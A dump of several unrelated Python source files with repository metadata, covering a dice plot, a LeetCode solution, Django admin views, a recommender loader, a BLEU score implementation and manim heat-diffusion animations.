x_values=list(range(1,dice.dice_num+1))
bar_data=[Bar(x=x_values,y=frequencies)]
x_axis_config={'title':'Results'}
    y_axis_config={'title':'Frequency of results'}
    layout=Layout(title='Results of rolling dice 100,000 times',xaxis=x_axis_config,yaxis=y_axis_config)
offline.plot({'data':bar_data,'layout':layout},filename='d6.html') | DrakeChow3/Stupid-stuff | Script1/rollingDice.py | rollingDice.py | py | 1,051 | python | en | code | 0 | github-code | 13 |
26455187113 | class Solution:
def removeElement(self, nums, val):
# nums = list(filter(lambda x: x!=val, nums))
# return len(nums)
# while val in nums:
# nums.remove(val)
# return len(nums)
# accepted answer
l = 0
for i in range(len(nums)):
if nums[i] != val:
nums[l] = nums[i]
l += 1
return l
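
# Added note: the accepted answer above is the classic two-pointer overwrite --
# l tracks the next write slot for kept elements, so nums[:l] holds the result
# and l is returned as the new logical length.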
if __name__ == '__main__':
sol = Solution()
print(sol.removeElement([1, 1, 2, 2], 2)) | Eyakub/Problem-solving | LeetCode/remove_element.py | remove_element.py | py | 500 | python | en | code | 3 | github-code | 13 |
15288499552 | from django.shortcuts import render, redirect
import datetime
import json
from django.core import serializers
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from admin.models import *
from haystack.query import SearchQuerySet  # needed by testsolr(); assumes django-haystack provides the Solr backend
def index(request):
context = {}
return render(request, 'admin/admin.html', context)
def testsolr(request):
a = SearchQuerySet().models(Business).filter(name="chic")
context = {'result': a}
return render(request, 'admin/solrtest.html', context)
def admin_espanol(request):
context = {}
return render(request, 'admin/admin-espanol.html', context)
def admin_translate(request):
context = {}
return render(request, 'admin/admin-translate.html', context)
def admin_espanol_edit(request):
context = {}
return render(request, 'admin/admin-espanol.html', context)
def categories(request):
context = {}
return render(request, 'admin/admin-cat.html', context)
def edit_category(request, cid=None):
context = {'cid': cid}
return render(request, 'admin/admin-edit.html', context)
def results_page(request, category):
    context = { 'catid': category }
    return render(request, 'admin/results.html', context)
def company_page(request, company_slug):
context = { 'company': company_slug }
return render(request, 'admin/sample-page.html', context)
def manage_featured(request):
context = {}
return render(request, 'admin/manage_featured.html', context)
# -------------- Admin Functions --------------------- #
def missing_photo_list(request):
bizs = Business.objects.all()
biz_without = []
for biz in bizs:
photos = BusinessImages.objects.filter(business_id=biz.id)
if not photos:
biz_without.append(biz.name + "<br />")
return HttpResponse(biz_without)
def fish_prices(request):
now = datetime.datetime.now()
today = now.date()
fp = FishPrices.objects.filter(fish_date=today)
fishies = []
for f in fp:
fishdict = {}
fishdict['name_english'] = f.fishname_english
fishdict['name_spanish'] = f.fishname_spanish
fishdict['price'] = f.price
fishdict['description'] = f.fish_description
fishdict['date'] = f.fish_date
fishdict['id'] = f.id
fishies.append(fishdict)
context = {'fishies': fishies}
return render(request, 'admin/fish_prices.html', context)
def add_fish_prices(request):
now = datetime.datetime.now()
today = now.date()
if request.method == "POST":
name_english = request.POST['fishname_english']
name_spanish = request.POST['fishname_spanish']
price = request.POST['price']
desc = request.POST['fish_description']
#date = request.POST['date']
f = FishPrices(fishname_english=name_english, fishname_spanish=name_spanish, fish_description=desc, price=price, fish_date=today)
f.save()
return HttpResponseRedirect('/admin/fish_prices/')
def del_fish_price(request, fishid=None):
if fishid:
f = FishPrices.objects.get(pk=fishid)
f.delete()
return HttpResponseRedirect('/admin/fish_prices/')
| kharron/sjdsdirectory | admin/views.py | views.py | py | 3,415 | python | en | code | 0 | github-code | 13 |
73607409936 | from collections import Counter as counter
from typing import Counter, Optional, Sequence, Tuple, Union
import torch
def bleu_score(
input: Union[str, Sequence[str]],
target: Sequence[Union[str, Sequence[str]]],
n_gram: int = 4,
weights: Optional[torch.Tensor] = None,
device: Optional[torch.device] = None,
) -> torch.Tensor:
"""
Compute BLEU score given translations and references for each translation.
    Its class version is ``torcheval.metrics.text.BLEUScore``.
Args:
input: Translations to score.
target: List of references for each translation. Requires len(input) = len(target)
n_gram: Maximum n-gram to use when computing BLEU score. Can be 1, 2, 3, or 4.
weights: Optional weight distribution of n-grams. Requires len(weights) = n_gram. If unspecified,
will use uniform weights.
Examples:
>>> import torch
        >>> from torcheval.metrics.functional.text.bleu import bleu_score
>>> candidates = ["the squirrel is eating the nut"]
>>> references = [["a squirrel is eating a nut", "the squirrel is eating a tasty nut"]]
>>> bleu_score(candidates, references, n_gram=4)
tensor(0.53728497)
>>> candidates = ["the squirrel is eating the nut", "the cat is on the mat"]
>>> references = [["a squirrel is eating a nut", "the squirrel is eating a tasty nut"], ["there is a cat on the mat", "a cat is on the mat"]]
>>> bleu_score(candidates, references, n_gram=4)
tensor(0.65341892)
"""
(
input_len,
target_len,
matches_by_order,
possible_matches_by_order,
) = _bleu_score_update(
input,
target,
n_gram,
device,
)
return _bleu_score_compute(
input_len,
target_len,
matches_by_order,
possible_matches_by_order,
n_gram,
weights,
)
def _bleu_score_update(
input: Union[str, Sequence[str]],
target: Sequence[Union[str, Sequence[str]]],
n_gram: int,
device: Optional[torch.device] = None,
) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]:
input_ = [input] if isinstance(input, str) else input
target_ = [[tgt] if isinstance(tgt, str) else tgt for tgt in target]
if len(input_) != len(target_):
raise ValueError(
f"Input and target corpus should have same sizes, but input corpus size = {len(input_)}, target corpus size = {len(target_)} "
)
input_len = torch.tensor(0, device=device)
target_len = torch.tensor(0, device=device)
matches_by_order = torch.zeros(n_gram, device=device)
possible_matches_by_order = torch.zeros(n_gram, device=device)
for (candidate, references) in zip(input_, target_):
candidate_tokenized = candidate.split()
references_tokenized = [ref.split() for ref in references]
len_candidate = len(candidate_tokenized)
len_reference = min([len(ref) for ref in references_tokenized])
input_len += len_candidate
target_len += len_reference
candidate_ngram_counter = _get_ngrams(candidate_tokenized, n_gram)
reference_ngram_counter = counter()
for ref in references_tokenized:
reference_ngram_counter |= _get_ngrams(ref, n_gram)
overlap = candidate_ngram_counter & reference_ngram_counter
for ngram in overlap:
matches_by_order[len(ngram) - 1] += overlap[ngram]
for i in range(n_gram):
if len_candidate - i > 0:
possible_matches_by_order[i] += len_candidate - i
if torch.min(possible_matches_by_order) == 0:
raise ValueError(
f"the input is too short to find all n-gram matches with n_gram={n_gram}"
)
return input_len, target_len, matches_by_order, possible_matches_by_order
def _bleu_score_compute(
input_len: torch.Tensor,
target_len: torch.Tensor,
matches_by_order: torch.Tensor,
possible_matches_by_order: torch.Tensor,
n_gram: int,
weights: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if weights is not None and n_gram != weights.size(dim=0):
raise ValueError(
f"the length of weights should equal n_gram, got len(weights)={weights.size(dim=0)}, n_gram={n_gram}"
)
if weights is None:
weights = torch.tensor([1 / n_gram] * n_gram)
precisions = matches_by_order / possible_matches_by_order
geometric_mean = torch.exp(torch.sum(weights * torch.log(precisions)))
brevity_penalty = _calc_brevity_penalty(input_len, target_len)
return brevity_penalty * geometric_mean
def _calc_brevity_penalty(
input_len: torch.Tensor, target_len: torch.Tensor
) -> torch.Tensor:
if input_len > target_len:
return torch.tensor(1.0, device=input_len.device)
else:
return torch.exp(1 - target_len / input_len)
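
# Added reference note: the helpers above implement the standard BLEU formula
# BLEU = BP * exp(sum_n w_n * log p_n), with brevity penalty
# BP = 1 if c > r else exp(1 - r / c), where c is the candidate (input) length
# and r the reference (target) length, matching _calc_brevity_penalty.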
def _get_ngrams(sentence: Sequence[str], n_gram: int) -> Counter[str]:
"""
Args:
sentence: text from which we get n-grams
n_gram: length of n-gram
"""
if n_gram not in [1, 2, 3, 4]:
raise ValueError(f"n_gram should be 1, 2, 3, or 4, got {n_gram}.")
ngram_counts = counter()
for n_val in range(1, n_gram + 1):
for i in range(0, len(sentence) - n_val + 1):
ngram = tuple(sentence[i : i + n_val])
ngram_counts[ngram] += 1
return ngram_counts
| pytorch/torcheval | torcheval/metrics/functional/text/bleu.py | bleu.py | py | 5,473 | python | en | code | 155 | github-code | 13 |
33942931130 | import logging
import time
from functools import lru_cache
from typing import List
import numpy as np
import psutil
from recommendations.estimator import discover_models
from recommendations.resolvers import get_resolvers
log = logging.getLogger(__name__)
@lru_cache(maxsize=None)
def load_model(model_name, *args, **kwargs):
"""Load model and initialize it. Cache it."""
models = discover_models()
if model_name not in models:
raise ValueError(f"Unknown model `{model_name}`")
start = time.time()
rss_start = psutil.Process().memory_info().rss
model = models[model_name](*args, **kwargs)
log.info(
f"Model `{model_name}` loaded in {time.time() - start:.2f} seconds,"
f" RSS: {(psutil.Process().memory_info().rss - rss_start) / 1024 / 1024:.2f} Mb"
)
return model
def safe_recommend(
model_name: str,
user_ids: List[int],
n_recs: int,
resolution_strategy="pure_random",
):
"""
Safe recommendation.
Args:
model_name: model name
user_ids: user ids
n_recs: number of recommendations
resolution_strategy: resolution strategy if error occurs
Returns:
np.array: array of recommendations
"""
resolvers = get_resolvers()
if resolution_strategy not in resolvers:
raise ValueError(f"Unknown resolution strategy `{resolution_strategy}`")
try:
model = load_model(model_name)
recommendations = model.recommend(user_ids, n_recs)
unique = []
# Create a list of unique recommendations
for rec in recommendations:
if rec not in unique:
unique.append(rec)
# If there are not enough unique recommendations, use the resolution strategy
# to get additional recommendations
if len(unique) < n_recs:
resolved = resolvers[resolution_strategy](user_ids, n_recs)
for x in resolved:
if x not in unique:
unique.append(x)
# Stop when we have enough unique recommendations
if len(unique) == n_recs:
break
# Return the first n_recs unique recommendations
return np.array(unique[:n_recs])
except Exception as e:
log.error(e)
return resolvers[resolution_strategy](user_ids, n_recs)
| YUNGC0DE/RecoServiceTeam30 | recommendations/model_utils.py | model_utils.py | py | 2,372 | python | en | code | null | github-code | 13 |
36791156934 | from manimlib import *
class BringTwoRodsTogether(Scene):
CONFIG = {
"step_size": 0.05,
"axes_config": {
"x_min": -1,
"x_max": 11,
"y_min": -10,
"y_max": 100,
"y_axis_config": {
"unit_size": 0.06,
"tick_frequency": 10,
},
},
"y_labels": range(20, 100, 20),
"graph_x_min": 0,
"graph_x_max": 10,
"midpoint": 5,
"max_temp": 90,
"min_temp": 10,
"wait_time": 30,
"default_n_rod_pieces": 20,
"alpha": 1.0,
}
def construct(self):
self.setup_axes()
self.setup_graph()
self.setup_clock()
self.show_rods()
self.show_equilibration()
def setup_axes(self):
axes = Axes(**self.axes_config)
axes.center().to_edge(UP)
y_label = axes.get_y_axis_label("\\text{Temperature}")
y_label.to_edge(UP)
axes.y_axis.label = y_label
axes.y_axis.add(y_label)
axes.y_axis.add_numbers(*self.y_labels)
self.axes = axes
self.y_label = y_label
def setup_graph(self):
graph = self.axes.get_graph(
self.initial_function,
x_min=self.graph_x_min,
x_max=self.graph_x_max,
step_size=self.step_size,
discontinuities=[self.midpoint],
)
graph.color_using_background_image("VerticalTempGradient")
self.graph = graph
def setup_clock(self):
clock = Clock()
clock.set_height(1)
clock.to_corner(UR)
clock.shift(MED_LARGE_BUFF * LEFT)
time_lhs = TexText("Time: ")
time_label = DecimalNumber(
0, num_decimal_places=2,
)
time_rhs = TexText("s")
time_group = VGroup(
time_lhs,
time_label,
# time_rhs
)
time_group.arrange(RIGHT, aligned_edge=DOWN)
time_rhs.shift(SMALL_BUFF * LEFT)
time_group.next_to(clock, DOWN)
self.time_group = time_group
self.time_label = time_label
self.clock = clock
def show_rods(self):
rod1, rod2 = rods = VGroup(
self.get_rod(0, 5),
self.get_rod(5, 10),
)
rod1.set_color(rod1[0].get_color())
rod2.set_color(rod2[-1].get_color())
rods.save_state()
rods.space_out_submobjects(1.5)
rods.center()
labels = VGroup(
Tex("90^\\circ"),
Tex("10^\\circ"),
)
for rod, label in zip(rods, labels):
label.next_to(rod, DOWN)
rod.label = label
self.play(
FadeIn(rod1, UP),
Write(rod1.label),
)
self.play(
FadeIn(rod2, DOWN),
Write(rod2.label)
)
self.wait()
self.rods = rods
self.rod_labels = labels
def show_equilibration(self):
rods = self.rods
axes = self.axes
graph = self.graph
labels = self.rod_labels
self.play(
Write(axes),
rods.restore,
rods.space_out_submobjects, 1.1,
FadeIn(self.time_group),
FadeIn(self.clock),
*[
MaintainPositionRelativeTo(
rod.label, rod
)
for rod in rods
],
)
br1 = Rectangle(height=0.2, width=1)
br1.set_stroke(width=0)
br1.set_fill(BLACK, opacity=1)
br2 = br1.copy()
br1.add_updater(lambda b: b.move_to(axes.c2p(0, 90)))
br1.add_updater(
lambda b: b.align_to(rods[0].get_right(), LEFT)
)
br2.add_updater(lambda b: b.move_to(axes.c2p(0, 10)))
br2.add_updater(
lambda b: b.align_to(rods[1].get_left(), RIGHT)
)
self.add(graph, br1, br2)
self.play(
ShowCreation(graph),
labels[0].align_to, axes.c2p(0, 87), UP,
labels[1].align_to, axes.c2p(0, 13), DOWN,
)
        self.wait()
self.play(
rods.restore,
rate_func=rush_into,
)
self.remove(br1, br2)
graph.add_updater(self.update_graph)
self.time_label.add_updater(
lambda d, dt: d.increment_value(dt)
)
rods.add_updater(self.update_rods)
self.play(
self.get_clock_anim(self.wait_time),
FadeOut(labels)
)
#
def get_clock_anim(self, time, **kwargs):
config = {
"run_time": time,
"hours_passed": time,
}
config.update(kwargs)
return ClockPassesTime(self.clock, **config)
def initial_function(self, x):
epsilon = 1e-10
if x < self.midpoint - epsilon:
return self.max_temp
elif x > self.midpoint + epsilon:
return self.min_temp
else:
return (self.min_temp + self.max_temp) / 2
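
    # Added note: update_graph advances the curve with explicit finite
    # differences -- n_mini_steps Euler sub-steps of u_t = alpha * u_xx,
    # using the centered second difference (rp - 2p + lp) / dx**2.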
def update_graph(self, graph, dt, alpha=None, n_mini_steps=500):
if alpha is None:
alpha = self.alpha
points = np.append(
graph.get_start_anchors(),
[graph.get_last_point()],
axis=0,
)
for k in range(n_mini_steps):
y_change = np.zeros(points.shape[0])
dx = points[1][0] - points[0][0]
for i in range(len(points)):
p = points[i]
lp = points[max(i - 1, 0)]
rp = points[min(i + 1, len(points) - 1)]
d2y = (rp[1] - 2 * p[1] + lp[1])
if (0 < i < len(points) - 1):
second_deriv = d2y / (dx**2)
else:
second_deriv = 2 * d2y / (dx**2)
# second_deriv = 0
y_change[i] = alpha * second_deriv * dt / n_mini_steps
# y_change[0] = y_change[1]
# y_change[-1] = y_change[-2]
# y_change[0] = 0
# y_change[-1] = 0
# y_change -= np.mean(y_change)
points[:, 1] += y_change
graph.set_points_smoothly(points)
return graph
def get_second_derivative(self, x, dx=0.001):
graph = self.graph
x_min = self.graph_x_min
x_max = self.graph_x_max
ly, y, ry = [
graph.point_from_proportion(
inverse_interpolate(x_min, x_max, alt_x)
)[1]
for alt_x in (x - dx, x, x + dx)
]
# At the boundary, don't return the second deriv,
# but instead something matching the Neumann
# boundary condition.
if x == x_max:
return (ly - y) / dx
elif x == x_min:
return (ry - y) / dx
else:
d2y = ry - 2 * y + ly
return d2y / (dx**2)
def get_rod(self, x_min, x_max, n_pieces=None):
if n_pieces is None:
n_pieces = self.default_n_rod_pieces
axes = self.axes
line = Line(axes.c2p(x_min, 0), axes.c2p(x_max, 0))
rod = VGroup(*[
Square()
for n in range(n_pieces)
])
rod.arrange(RIGHT, buff=0)
rod.match_width(line)
rod.set_height(0.2, stretch=True)
rod.move_to(axes.c2p(x_min, 0), LEFT)
rod.set_fill(opacity=1)
rod.set_stroke(width=1)
rod.set_sheen_direction(RIGHT)
self.color_rod_by_graph(rod)
return rod
def update_rods(self, rods):
for rod in rods:
self.color_rod_by_graph(rod)
def color_rod_by_graph(self, rod):
for piece in rod:
piece.set_color(color=[
self.rod_point_to_color(piece.get_left()),
self.rod_point_to_color(piece.get_right()),
])
def rod_point_to_graph_y(self, point):
axes = self.axes
x = axes.x_axis.p2n(point)
graph = self.graph
alpha = inverse_interpolate(
self.graph_x_min,
self.graph_x_max,
x,
)
return axes.y_axis.p2n(
graph.point_from_proportion(alpha)
)
def y_to_color(self, y):
y_max = self.max_temp
y_min = self.min_temp
alpha = inverse_interpolate(y_min, y_max, y)
return temperature_to_color(interpolate(-0.8, 0.8, alpha))
def rod_point_to_color(self, point):
return self.y_to_color(
self.rod_point_to_graph_y(point)
)
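
# Editor's note (not in the original file): with ManimGL these scenes are
# typically rendered from the command line, e.g.
#   manimgl manim_anim.py BringTwoRodsTogether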
class ShowEvolvingTempGraphWithArrows(BringTwoRodsTogether):
CONFIG = {
"alpha": 0.1,
"arrow_xs": np.linspace(0, 10, 22)[1:-1],
"arrow_scale_factor": 0.5,
"max_magnitude": 1.5,
"wait_time": 30,
"freq_amplitude_pairs": [
(1, 0.5),
(2, 1),
(3, 0.5),
(4, 0.3),
(5, 0.3),
(7, 0.2),
(21, 0.1),
(41, 0.05),
],
}
def construct(self):
self.add_axes()
self.add_graph()
self.add_clock()
self.add_rod()
self.add_arrows()
self.initialize_updaters()
self.let_play()
def add_axes(self):
self.setup_axes()
self.add(self.axes)
def add_graph(self):
self.setup_graph()
self.add(self.graph)
def add_clock(self):
self.setup_clock()
self.add(self.clock)
self.add(self.time_label)
self.time_label.next_to(self.clock, DOWN)
def add_rod(self):
rod = self.rod = self.get_rod(
self.graph_x_min,
self.graph_x_max,
)
self.add(rod)
def add_arrows(self):
graph = self.graph
x_min = self.graph_x_min
x_max = self.graph_x_max
xs = self.arrow_xs
arrows = VGroup(*[Vector(DOWN) for x in xs])
asf = self.arrow_scale_factor
def update_arrows(arrows):
for x, arrow in zip(xs, arrows):
d2y_dx2 = self.get_second_derivative(x)
mag = asf * np.sign(d2y_dx2) * abs(d2y_dx2)
mag = np.clip(
mag,
-self.max_magnitude,
self.max_magnitude,
)
arrow.put_start_and_end_on(
ORIGIN, mag * UP
)
point = graph.point_from_proportion(
inverse_interpolate(x_min, x_max, x)
)
arrow.shift(point - arrow.get_start())
arrow.set_color(
self.rod_point_to_color(point)
)
arrows.add_updater(update_arrows)
self.add(arrows)
self.arrows = arrows
def initialize_updaters(self):
if hasattr(self, "graph"):
self.graph.add_updater(self.update_graph)
if hasattr(self, "rod"):
self.rod.add_updater(self.color_rod_by_graph)
if hasattr(self, "time_label"):
self.time_label.add_updater(
lambda d, dt: d.increment_value(dt)
)
def let_play(self):
self.run_clock(self.wait_time)
def run_clock(self, time):
self.play(
ClockPassesTime(
self.clock,
run_time=time,
hours_passed=time,
),
)
#
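    # Added note: temp_func below is a truncated Fourier sine series solution
    # of the 1-D heat equation u_t = alpha * u_xx on a rod of length 10; each
    # mode sin(freq * x') decays like exp(-(alpha * freq**2) * t).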
def temp_func(self, x, t):
new_x = TAU * x / 10
return 50 + 20 * np.sum([
amp * np.sin(freq * new_x) *
np.exp(-(self.alpha * freq**2) * t)
for freq, amp in self.freq_amplitude_pairs
])
def initial_function(self, x, time=0):
return self.temp_func(x, 0)
| nadav7679/phase_field_Ni_batteries | manim_anim.py | manim_anim.py | py | 11,722 | python | en | code | 0 | github-code | 13 |